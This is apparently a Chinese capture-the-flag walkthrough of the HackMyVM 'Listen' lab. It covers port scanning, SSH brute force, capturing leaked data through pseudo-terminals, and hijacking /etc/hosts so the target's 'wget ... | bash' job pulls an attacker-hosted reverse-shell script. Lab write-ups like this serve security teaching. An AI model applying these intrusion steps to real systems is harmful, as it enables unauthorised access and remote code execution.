Listen
项目地址:https://downloads.hackmyvm.eu/listen.zip
是一个打包好的镜像文件
注意:导入 ova 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本
弱口令
SSH
再次扫描又开放了
浏览器访问无响应,使用命令请求拿到内容
在最下面有注释,给出了用户名以及密码哈希
因为 SSH 是开放的,所以直接爆破得了,得到
1 | login: leo |
提权
敏感信息泄露
看了一下还有两个用户需要提权
真阴啊,还得抓包拿敏感信息提权
查看提示
/dev/pts/ 是 Linux 的 伪终端(PTY) 设备目录,但是查看又没有 4
每当用户通过 SSH、telnet、终端模拟器 等方式登录系统时,系统会为其分配一个 /dev/pts/N(N为数字编号)
所以我们创建五个 SSH 连接
最后会被输出到终端中
提权成功
/etc/hosts 劫持
然后发现文件 listentome.sh 文件在请求 ihearyou 并执行
1 | wget -O - -q http://listen/ihearyou.sh | bash |
Ping 过去发现是本地,这通常是在 hosts 中定义的
查看文件发现我们可写
于是可以劫持这个文件,修改对应的 IP 解析为我们 Kali 的地址
创建一个同名的反弹 Shell 文件
等待一段时间即可拿到 Shell
1 | HMVimlistening |